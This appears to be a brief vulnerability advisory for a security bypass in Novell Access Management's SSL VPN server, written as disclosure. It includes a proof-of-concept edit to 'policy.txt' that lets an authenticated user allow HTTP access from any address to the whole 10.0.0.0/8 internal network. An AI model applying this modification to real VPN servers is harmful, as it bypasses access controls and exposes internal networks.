Novell Access Management SSLVPN Server Security Bypass Vulnerability

Novell Access Management SSLVPN Server Security Bypass Vulnerability

To exploit this issue, an attacker requires authenticated access to a vulnerable SSL VPN server.

The attacker can use a standard browser for this attack.

A proof-of-concept modification to 'policy.txt' would be as follows:

sslize {
from : 0.0.0.0 / 0
to :10.0.0.0/255.0.0.0
port : 80
protocol :tcp
action :allow
};

The above example demonstrates how an attacker would allow their client machine HTTP access to any host on the remote network.